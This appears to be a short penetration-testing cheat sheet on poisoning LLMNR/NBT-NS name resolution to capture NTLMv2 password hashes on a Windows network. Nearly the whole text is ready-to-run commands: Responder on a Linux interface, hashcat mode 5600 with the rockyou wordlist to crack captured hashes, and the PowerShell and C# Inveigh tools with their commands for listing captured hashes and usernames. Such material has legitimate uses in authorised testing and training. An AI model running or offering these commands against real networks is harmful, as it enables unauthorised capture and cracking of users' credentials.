From Linux

Embed GitHub

sudo responder -I eth0 

Wait for hashes to come in

Crack them with

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

From Windows

Using Inveigh

Embed GitHub

Import-Module .\Inveigh.ps1

Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y

C# Inveigh (InveighZero)

.\Inveigh.exe

We can quickly view unique captured hashes by typing GET NTLMV2UNIQUE.

We can type in GET NTLMV2USERNAMES and see which usernames we have collected. This is helpful if we want a listing of users to perform additional enumeration against and see which are worth attempting to crack offline using Hashcat.